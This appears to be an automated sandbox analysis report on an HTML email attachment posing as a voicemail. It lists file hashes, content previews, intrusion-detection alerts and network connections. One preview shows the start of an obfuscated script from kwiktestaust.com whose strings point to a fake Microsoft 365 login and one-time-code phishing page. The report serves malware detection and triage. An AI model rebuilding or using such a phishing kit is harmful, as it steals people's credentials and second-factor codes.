                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format (Version 2), TrueType, length 154228, version 769.768
                                                                Category:downloaded
                                                                Size (bytes):154228
                                                                Entropy (8bit):7.996770916751852
                                                                Encrypted:true
                                                                SSDEEP:3072:1s6054PmrMMxqMo/sE4yN1JWxUY+qI2kqdYt2B1dqchgjwQ:W68io3G5JYktDt62b
                                                                MD5:55B416A8DF21F9F987AA352F10D1343B
                                                                SHA1:2717F3F58271F2F2E6120D9937C7227002656D34
                                                                SHA-256:D76FB4E841748A3F6BC63EFA23156E02631C283BF41F84EFCBDAF339EA3E1B73
                                                                SHA-512:7C4983811EBA2AE80998C62C0EB48CC53EEC26E3CA4222D5CF0A758A5EA92E6A14DCFED4FE5B7EF5513F89BE2C0F336D0131687FA3EDDCBD4BB218BBD6BEB985
                                                                Malicious:false
                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2
                                                                Preview:wOF2......Zt.......(..Z).........................8.$. .`..(...@..(.,..p. .....Hp......aD.f.O..q....@UUUU....l......G?../~.....O.................O......l...x}~.....=...N.'........Gu@..p1.G.....f,.*..V<[..W..U.W#......@....."[.D.8....L..7I......O.{v....E.bQY..B.P+F..)...?......<....e...4.X...H.`tA...@.@.v........GT.~!].....VV7..L.&.D..p.\G..~g.....^....ew.kT..3........pa.......W....A7..`.t/I;.3-K.vdK....D.m.ds.....A...b...#.?...G.O.m..=.....ux.:..gr.......3...v..t.{.p.x..@H..$.B#.H.....4rB.>..........'..8.......pj.<.h4..g..q,Y...Nb[.....ms.^L.0...]}....~.'....w?a>.9?.........H.O.fF#i4....L..;..4q...7a.m.m...R..3.\.v...b.....]B/Aex......lo.f..e .!.@X5....wb...q....=QL..R.._.............EE.W..._..Z.K...q.....2..........`..6..C...jj..#&A=@.>^..N.2.3....P.....t....Y.i..T..LN2..:x.V\..Z.7../1|.x.V..~......=3.!...y...lz.O..<.dgCR4.A....8.p.aq...h.....6.>.e:...NQ.h....L.G2.V[.f...Ai.=+..+ ...'l..i.+C.t)s.(j...WZ_:..\9.Y..U.]......A.y..9........\xf.;.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):2228
                                                                Entropy (8bit):7.82817506159911
                                                                Encrypted:false
                                                                SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                Malicious:false
                                                                Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (2044)
                                                                Category:downloaded
                                                                Size (bytes):4229
                                                                Entropy (8bit):5.181399648892507
                                                                Encrypted:false
                                                                SSDEEP:96:lW+9Jg/k5PG5Py5PevSd++OICtJxtomlGDWtVA2i44:M+9JUk5e5a5eSdpOICtlomlHi44
                                                                MD5:A53BB8C7EE26EB64581D4FAA2469E12F
                                                                SHA1:42B956C7C03445ED66B9841CA75E926A2DDD67C8
                                                                SHA-256:DBFA7F3B0E80D573E95BB1562A8575B052D779994A80D3FCD8AFA098E09C77A7
                                                                SHA-512:CFFC8C6107F6BA69D171E3FA54FF1A695EE93A6CC7C3A581F976D02959C8D19FC8821A416DD1449065F5C4D43720BE551CABF89A981547B15697C296E2F1C25E
                                                                Malicious:false
                                                                URL:https://kwiktestaust.com/favicon.ico
                                                                Preview:<html>. <head>. <title>COMING SOON</title>. <body>. <div class="bgimg">. <div class="middle">. <h1>COMING SOON</h1>. <hr>. <p id="demo" style="font-size:30px"></p>. </div>. </div>. <style>. body,. html {. height: 100%;. margin: 0;. }.. .bgimg {. background-image: url("https://i.imgur.com/xA8aaXN.png");. height: 100%;. background-position: center;. background-size: cover;. position: relative;. color: white;. font-family: "Courier New", Courier, monospace;. font-size: 25px;. }.. .topleft {. position: absolute;. top: 0;. left: 16px;. }.. .bottomleft {. position: absolute;. bottom: 0;. left: 16px;. }.. .middle {. position: absolute;. top: 80%;. left: 50%;. transform: translate(-50%, -50%);. text-align: center;. }.. hr {. margin: auto;.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1636
                                                                Entropy (8bit):4.214613323368661
                                                                Encrypted:false
                                                                SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                                MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                                SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                                SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                                SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                                Malicious:false
                                                                URL:https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65451)
                                                                Category:dropped
                                                                Size (bytes):89476
                                                                Entropy (8bit):5.2896589255084425
                                                                Encrypted:false
                                                                SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                Malicious:false
                                                                Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                                Category:downloaded
                                                                Size (bytes):2407
                                                                Entropy (8bit):7.900400471609788
                                                                Encrypted:false
                                                                SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                                                MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                                SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                                SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                                SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
                                                                Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                                Category:downloaded
                                                                Size (bytes):276
                                                                Entropy (8bit):7.316609873335077
                                                                Encrypted:false
                                                                SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                                MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                                SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                                SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                                SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                                Malicious:false
                                                                URL:https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                                                Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                                Category:downloaded
                                                                Size (bytes):199
                                                                Entropy (8bit):6.766983163126765
                                                                Encrypted:false
                                                                SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                                MD5:21B761F2B1FD37F587D7222023B09276
                                                                SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                                SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                                SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg
                                                                Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:exported SGML document, Unicode text, UTF-8 text, with very long lines (65506)
                                                                Category:dropped
                                                                Size (bytes):121471
                                                                Entropy (8bit):4.443908666102784
                                                                Encrypted:false
                                                                SSDEEP:3072:Angz3cwtj4+eS6e6+XE3TLc7xfmmmmmUmBs/N:AnU3cwtj4+eS6e6+XE3TL0
                                                                MD5:0C2413076F37B636087297C71191175B
                                                                SHA1:3F03A31CC5F0588AB1BCDA5FE9F19302DC4DE035
                                                                SHA-256:07ECE4A92AC49F87F483CCB104ADDF542B8B0D7372D52BE35D01F1C2FD3646E7
                                                                SHA-512:66C6554F527CF655CF62DEFD606EDD897F9A9CBF28205BDCAE92DD006FA1FA0855E38D0C37C7A14DD076ED4A92727D5FDEFF21A43FF8A1FDE8C04540EA39DD7A
                                                                Malicious:false
                                                                Preview:function _0xb276() {. const _0x5ed944 = ['href', '.phoneotpText', 'readyState', '#playme_big', '@ionos.', '#playme', 'resize', 's2c_restart', '.loaderxBlock11', 's2c', 'complete', 'O365', 'url(\x27https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg\x27)', '@163.', 'trim', '#fff', 'location', 'focus', 'beforeend', 'onblur', '@yandex.', 'load', 'RQ_EMAIL', '375242BWnaRd', 'body', 'Trying\x20to\x20sign\x20you\x20in\x20...', '#allbody', 'endUrl', 'RQ_OTP_APP', 'onfocus', '.logerMe', '.appotpCode', '.otpInput2', 'https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg', 'keyup', 'disconnect', '<p/>', '1007762XNswUc', 'test', 'includes', 'interactive', '.loaderxBlock2', '#000', 'width', 'CORRECT_OTP', 'otp_command', '.grayBox', '.emailInput', '.msappBlock', 'authentication-server.com', 'reload', 'attachEvent', '.passwordError', 'RQ_OTP_NOPASS_APP', '#base_icons', 'top', '.backArrow', '\x0a\x
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text
                                                                Category:downloaded
                                                                Size (bytes):23427
                                                                Entropy (8bit):5.112735417225198
                                                                Encrypted:false
                                                                SSDEEP:384:1HHLO7eS0F4bBY/fn6jZcy9/cGK1q8CarY64Cb+dOy:1HHCLYXfl1q8CarY64Cb+dl
                                                                MD5:BA0537E9574725096AF97C27D7E54F76
                                                                SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                                                SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                                                                SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                                                Malicious:false
                                                                URL:https://www.w3schools.com/w3css/4/w3.css
                                                                Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (2044)
                                                                Category:dropped
                                                                Size (bytes):4229
                                                                Entropy (8bit):5.181399648892507
                                                                Encrypted:false
                                                                SSDEEP:96:lW+9Jg/k5PG5Py5PevSd++OICtJxtomlGDWtVA2i44:M+9JUk5e5a5eSdpOICtlomlHi44
                                                                MD5:A53BB8C7EE26EB64581D4FAA2469E12F
                                                                SHA1:42B956C7C03445ED66B9841CA75E926A2DDD67C8
                                                                SHA-256:DBFA7F3B0E80D573E95BB1562A8575B052D779994A80D3FCD8AFA098E09C77A7
                                                                SHA-512:CFFC8C6107F6BA69D171E3FA54FF1A695EE93A6CC7C3A581F976D02959C8D19FC8821A416DD1449065F5C4D43720BE551CABF89A981547B15697C296E2F1C25E
                                                                Malicious:false
                                                                Preview:<html>. <head>. <title>COMING SOON</title>. <body>. <div class="bgimg">. <div class="middle">. <h1>COMING SOON</h1>. <hr>. <p id="demo" style="font-size:30px"></p>. </div>. </div>. <style>. body,. html {. height: 100%;. margin: 0;. }.. .bgimg {. background-image: url("https://i.imgur.com/xA8aaXN.png");. height: 100%;. background-position: center;. background-size: cover;. position: relative;. color: white;. font-family: "Courier New", Courier, monospace;. font-size: 25px;. }.. .topleft {. position: absolute;. top: 0;. left: 16px;. }.. .bottomleft {. position: absolute;. bottom: 0;. left: 16px;. }.. .middle {. position: absolute;. top: 80%;. left: 50%;. transform: translate(-50%, -50%);. text-align: center;. }.. hr {. margin: auto;.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65451)
                                                                Category:downloaded
                                                                Size (bytes):89476
                                                                Entropy (8bit):5.2896589255084425
                                                                Encrypted:false
                                                                SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                Malicious:false
                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js
                                                                Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):52
                                                                Entropy (8bit):4.190260390968384
                                                                Encrypted:false
                                                                SSDEEP:3:OnuZoS+NT/ZoS8/ZYn:OnuZoSyT/ZoS8/ZYn
                                                                MD5:09BDE5D10D92DEBBB74AE9C3DF3AECAB
                                                                SHA1:2F4EEA05E85C26DE82C5E7CBA471687EC8D855EC
                                                                SHA-256:F67F67274C88240DE01FA51D483271F58A5752B607B13DEE041C7A0671290E7F
                                                                SHA-512:0FF4A460BC9068E61B6EEC0078E97F2AD0DCD12288E8161688351C3BB85A87D624E5B7635C47ED1B5B93C6D3B4A29A756A75A897394B4E6A3986BBB1762CFC6C
                                                                Malicious:false
                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQnIvTLEJtcvIhIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4=?alt=proto
                                                                Preview:CiQKBw2RYZVOGgAKBw01hlQcGgAKBw2RYZVOGgAKBw2RYZVOGgA=
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:exported SGML document, Unicode text, UTF-8 text, with very long lines (65506)
                                                                Category:downloaded
                                                                Size (bytes):121471
                                                                Entropy (8bit):4.443908666102784
                                                                Encrypted:false
                                                                SSDEEP:3072:Angz3cwtj4+eS6e6+XE3TLc7xfmmmmmUmBs/N:AnU3cwtj4+eS6e6+XE3TL0
                                                                MD5:0C2413076F37B636087297C71191175B
                                                                SHA1:3F03A31CC5F0588AB1BCDA5FE9F19302DC4DE035
                                                                SHA-256:07ECE4A92AC49F87F483CCB104ADDF542B8B0D7372D52BE35D01F1C2FD3646E7
                                                                SHA-512:66C6554F527CF655CF62DEFD606EDD897F9A9CBF28205BDCAE92DD006FA1FA0855E38D0C37C7A14DD076ED4A92727D5FDEFF21A43FF8A1FDE8C04540EA39DD7A
                                                                Malicious:false
                                                                URL:https://kwiktestaust.com/o/jsv.js
                                                                Preview:function _0xb276() {. const _0x5ed944 = ['href', '.phoneotpText', 'readyState', '#playme_big', '@ionos.', '#playme', 'resize', 's2c_restart', '.loaderxBlock11', 's2c', 'complete', 'O365', 'url(\x27https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg\x27)', '@163.', 'trim', '#fff', 'location', 'focus', 'beforeend', 'onblur', '@yandex.', 'load', 'RQ_EMAIL', '375242BWnaRd', 'body', 'Trying\x20to\x20sign\x20you\x20in\x20...', '#allbody', 'endUrl', 'RQ_OTP_APP', 'onfocus', '.logerMe', '.appotpCode', '.otpInput2', 'https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg', 'keyup', 'disconnect', '<p/>', '1007762XNswUc', 'test', 'includes', 'interactive', '.loaderxBlock2', '#000', 'width', 'CORRECT_OTP', 'otp_command', '.grayBox', '.emailInput', '.msappBlock', 'authentication-server.com', 'reload', 'attachEvent', '.passwordError', 'RQ_OTP_NOPASS_APP', '#base_icons', 'top', '.backArrow', '\x0a\x
                                                                File type:HTML document, ASCII text, with very long lines (43940)
                                                                Entropy (8bit):5.293856230343034
                                                                TrID:
                                                                • HyperText Markup Language (15015/1) 55.58%
                                                                • HyperText Markup Language (12001/1) 44.42%
                                                                File name:#U25b6#Ufe0fVmail__00_15.html
                                                                File size:44'438 bytes
                                                                MD5:0f3b46e65b743b4e63336bf7fa7a31ff
                                                                SHA1:539a318c5fa721c3d98cffd8bd4b9ea9a13be7a1
                                                                SHA256:a70eb5de31036e4180e419216e790583d8e8f659c21faab6cc1455aeae9b6b77
                                                                SHA512:cba393a99282d5ef82ebe836ef2f2c91767d8d235bc7b8eecfbf1131777f41001d61c05502878334df823c5d9cdd7e7cbdb6badc6b041d3462a7f99959074869
                                                                SSDEEP:768:rnRNgBEsyL3mEHheOt894PTGQXZyXo824:/gBEsyL3mqheOt896ZI
                                                                TLSH:AD13C9C9AEF9FED01C5472ED39C3899448D5928EE01E5324453757FB993A80A88DB8CF
                                                                File Content Preview:<!DOCTYPE html>. <html lang="en">. <head>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>. <script>. (function() {. window.console.log = function() {};. window.console.warn
                                                                Icon Hash:173149cccc490307
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-11-07T21:40:01.592594+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.1649715188.114.97.3443TCP
                                                                2024-11-07T21:40:07.995247+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.1649741TCP
                                                                2024-11-07T21:40:45.981147+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.1649758TCP
                                                                2024-11-07T21:41:21.760823+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.1649785188.114.97.3443TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 7, 2024 21:39:57.731530905 CET49673443192.168.2.16204.79.197.203
                                                                Nov 7, 2024 21:39:58.011274099 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.011302948 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.011403084 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.011625051 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.011635065 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.034220934 CET49673443192.168.2.16204.79.197.203
                                                                Nov 7, 2024 21:39:58.636239052 CET49673443192.168.2.16204.79.197.203
                                                                Nov 7, 2024 21:39:58.652507067 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.653687000 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.653707027 CET44349706104.17.25.14192.168.2.16
